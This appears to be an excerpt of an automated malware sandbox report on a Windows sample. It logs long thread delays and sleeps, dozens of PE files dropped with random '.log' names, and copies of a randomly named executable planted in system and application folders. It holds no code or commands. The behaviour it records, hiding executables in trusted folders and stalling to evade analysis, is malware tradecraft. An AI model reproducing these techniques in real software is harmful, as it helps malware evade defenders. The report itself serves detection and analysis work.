                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 599796
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 3600000
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 598718
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 597828
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 597375
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 596468
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 595281
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 594790
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 594576
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 593531
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 591343
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 590953
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 589509
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 588812
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 588461
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 588136
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 587593
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 587350
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 587166
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 586900
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 586468
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 586174
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 300000
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 585871
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 584340
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 584166
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 583975
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 583656
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 583425
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 583305
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 582187
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 581949
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 581629
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 581455
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 581232
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 580961
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 580801
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 580604
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 580095
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 579637
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 579159
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 578796
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 578578
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 578328
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 577135
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 576812
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 576343
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 575968
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 575489
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 573886
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 572540
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 572203
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571968
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571754
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571562
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571234
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571039
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 570920
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1301Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1315Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1299Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1984
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1834
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1780
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1182
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1355
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1223
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1299
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1254
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWindow / User API: threadDelayed 874
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1024
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 768
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 937
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 740
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1032
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 814
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 840
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 867
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 982
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 842
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 773
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 783
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\qwPLRqWX.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\ucDhZRLu.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\ThILVSlx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\FAtHPtxq.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZrGvzZJn.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\QWdyfgGf.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\udiCoAET.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\QXRfkjyW.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\dVnCFeff.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\xLpaQOdH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\tmGCYmXQ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\wFqSLbvP.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\zhcyQjUk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\bQGwUejE.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\rmNqRUKB.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\QImfPxDF.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\bcXTThuh.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\BargBgFj.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\LBbeHZkL.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\sTDIJUfq.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\EVQZcBiW.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\XQlMiBJi.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\WBPEscIu.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\sRYTiegb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\LCxGrujI.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\TfOoGCsS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\rNFADhxz.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\OlTNIjCM.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\WgiUHyMw.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\jGLeSKCo.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\VkvurCps.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\yUQAQjKk.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\Zallyypm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\pKSShysD.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\kOdTVPKT.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\KVHoAvPS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\HDgqkcCm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\FizIvULx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\QujYzohZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\npJJQJjz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\RGOnlxSA.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEJGOfpT.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\twjrRmqB.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\mzvrpXvN.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\HTUGeMKX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\AfaiVEic.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\pyJigHPD.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\afwLyhfm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\lnWbuaeE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\RmrNprNr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\exStwvKV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\UXWdwFYk.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\mHfKTHWS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\VZRFxCWH.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\xfqPuAPp.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\gPpSweJV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\BwYQnKCg.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\SDpvGwhv.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\SYQgAPKa.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\SingkCdX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\BnpyIbbb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\NPXweASH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\swyioMDw.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\XjnFxUBI.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\kHClnwJL.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\kuPmEXym.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\fSOKaeua.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\uuKznmFw.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\XmhcMluo.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\MgnHXjFm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\jybLobci.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\QNGyvuni.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\IrkyWqxk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeDropped PE file which has not been started: C:\Users\user\Desktop\pHCSiMBb.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\FQiXIcGc.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe TID: 1456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 1301 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 1315 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 1299 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 1984 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep count: 1834 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep count: 1780 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 1182 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 1355 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8380Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep count: 1477 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 1223 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 1299 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 1254 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8396Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\conhost.exe TID: 9192Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe TID: 9180Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 9108Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exe TID: 9196Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe TID: 8344Thread sleep time: -922337203685477s >= -30000s
